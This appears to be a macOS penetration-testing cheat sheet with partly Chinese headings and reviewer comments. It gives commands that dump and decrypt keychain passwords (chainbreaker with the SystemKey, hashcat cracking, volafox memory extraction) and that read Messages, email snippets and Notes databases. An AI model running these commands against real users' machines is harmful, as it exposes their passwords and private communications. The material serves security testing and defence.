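# security: built-in macOS CLI for keychains, certificates and trust settings.

# List certificate trust settings for the current user.
# Options: -s shows the system domain, -d the admin domain. The bracketed
# "[-s] [-d]" synopsis is kept out of the command line because the shell
# would read the brackets as glob patterns, not as options.
security dump-trust-settings

# List keychain dbs
security list-keychains

# List smartcards
security list-smartcards

# List keychain entries: each "keychain" line plus the five lines that
# follow it, with the "version" lines filtered out.
security dump-keychain | grep -A 5 "keychain" | grep -v "version"

# Dump all the info, secrets included. The user will be asked for their
# password, even if root, so the authorization prompt is the control that
# stands between this command and the plaintext values.
security dump-keychain -d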
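# Dump all keys of the keychain (without the passwords).
# No key or password is passed to chainbreaker here, so only the record
# metadata of the System keychain is listed and secret values stay encrypted.
python2.7 chainbreaker.py --dump-all /Library/Keychains/System.keychain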
使用 SystemKey 转储钥匙串密钥(带密码)
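# First, get the keychain decryption key.
# To get this decryption key you need to be root and SIP must be disabled,
# so a host that keeps SIP enabled does not expose /var/db/SystemKey this
# way; a read of that file from an interactive shell or script is worth
# alerting on.
# hexdump skips the first 8 bytes and prints the next 24 as lowercase hex;
# the trailing echo only adds a newline.
hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey && echo

# Use the previous key to decrypt the passwords.
# The --key value below is the page's sample; it stands for the hex string
# printed by the hexdump step.
python2.7 chainbreaker.py --dump-all \
  --key 0293847570022761234562947e0bcd5bc04d196ad2345697 \
  /Library/Keychains/System.keychain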
通过破解哈希转储钥匙串密钥(带密码)
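# Get the keychain hash
python2.7 chainbreaker.py --dump-keychain-password-hash /Library/Keychains/System.keychain

# Crack it with hashcat (-m 23100 is hashcat's Apple Keychain mode).
# This is a dictionary run, so it only succeeds when the keychain password
# is guessable; password strength is the mitigation for this step.
hashcat.exe -m 23100 --keep-guessing hashes.txt dictionary.txt

# Use the key to decrypt the passwords.
# The --key value below is the page's sample value.
python2.7 chainbreaker.py --dump-all \
  --key 0293847570022761234562947e0bcd5bc04d196ad2345697 \
  /Library/Keychains/System.keychain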
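# Use volafox (https://github.com/n0fate/volafox) to extract possible
# keychain passwords from a memory image.
# Unfortunately volafox isn't working with the latest versions of macOS.
# -i names the memory image, -o the volafox command to run against it.
python vol.py -i ~/Desktop/show/macosxml.mem -o keychaindump

# Try to extract the passwords using the extracted keychain passwords.
# The --key value below is the page's sample value.
python2.7 chainbreaker.py --dump-all \
  --key 0293847570022761234562947e0bcd5bc04d196ad2345697 \
  /Library/Keychains/System.keychain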
使用用户密码转储钥匙串密钥(带密码)
如果您知道用户的密码,您可以使用它来转储和解密属于该用户的钥匙串。
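# Prompt to ask for the password, then dump and decrypt that user's login
# keychain.
# <username> is a placeholder for the account's short name. The path is
# quoted because an unquoted "<username>" is parsed by the shell as an input
# redirection followed by an output redirection, which would open the
# keychain path for writing instead of passing it to chainbreaker.
python2.7 chainbreaker.py --dump-all --password-prompt \
  "/Users/<username>/Library/Keychains/login.keychain-db"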
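# Inspect the Messages database of the current user.
# Paths are quoted so a home directory containing spaces does not split the
# argument, and the databases are opened with -readonly because every
# statement here is a SELECT and the evidence should not be modified.
# NOTE(review): on current macOS, ~/Library/Messages is TCC-protected, so
# the calling process needs Full Disk Access; confirm for the target version.
sqlite3 -readonly "$HOME/Library/Messages/chat.db" .tables
sqlite3 -readonly "$HOME/Library/Messages/chat.db" 'select * from message'
sqlite3 -readonly "$HOME/Library/Messages/chat.db" 'select * from attachment'
sqlite3 -readonly "$HOME/Library/Messages/chat.db" 'select * from deleted_messages'

# Email snippets collected by the Suggestions service.
# NOTE(review): the path is kept as the page gives it; this database is
# usually found under ~/Library/Suggestions, so verify before relying on it.
sqlite3 -readonly "$HOME/Suggestions/snippets.db" 'select * from emailSnippets'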
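# List the tables of the Apple Notes store of the current user.
notes_db="$HOME/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite"
sqlite3 -readonly "$notes_db" .tables

# To dump it in a readable format:
# each ZICNOTEDATA row holds a gzip-compressed body in ZDATA. The body is
# written to a scratch file and decompressed to stdout.
# Fixes over the one-liner: the blob was written as 'body1.gz.z' but read
# back as 'body1.gz.Z', which only works on a case-insensitive volume; the
# scratch file now comes from mktemp instead of a fixed name in the current
# directory; and gzip -dc reads it from stdin, so no filename suffix matters.
if blob=$(mktemp); then
  while IFS= read -r pk; do
    # Z_PK is interpolated into SQL below, so accept plain integers only.
    [[ "$pk" =~ ^[0-9]+$ ]] || continue
    sqlite3 -readonly "$notes_db" \
      "select writefile('$blob', ZDATA) from ZICNOTEDATA where Z_PK = $pk;" \
      >/dev/null
    gzip -dc <"$blob"
  done < <(sqlite3 -readonly "$notes_db" "select Z_PK from ZICNOTEDATA;")
  rm -f -- "$blob"
fi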
[...]
<!-- Per-attribute access-control entries for Computers records. Each entry
     grants the listed permissions (readattr, writeattr) to the principal
     identified by uuid. Both attributes shown here carry credential
     material, so changes to these lists deserve review. -->
<key>dsRecTypeStandard:Computers</key>
<dict>
    <key>dsAttrTypeNative:ShadowHashData</key>
    <array>
        <dict>
            <!-- allow wheel even though it's implicit -->
            <key>uuid</key>
            <string>ABCDEFAB-CDEF-ABCD-EFAB-CDEF00000000</string>
            <key>permissions</key>
            <array>
                <string>readattr</string>
                <string>writeattr</string>
            </array>
        </dict>
    </array>
    <key>dsAttrTypeNative:KerberosKeys</key>
    <array>
        <dict>
            <!-- allow wheel even though it's implicit -->
            <key>uuid</key>
            <string>ABCDEFAB-CDEF-ABCD-EFAB-CDEF00000000</string>
            <key>permissions</key>
            <array>
                <string>readattr</string>
                <string>writeattr</string>
            </array>
        </dict>
    </array>
[...]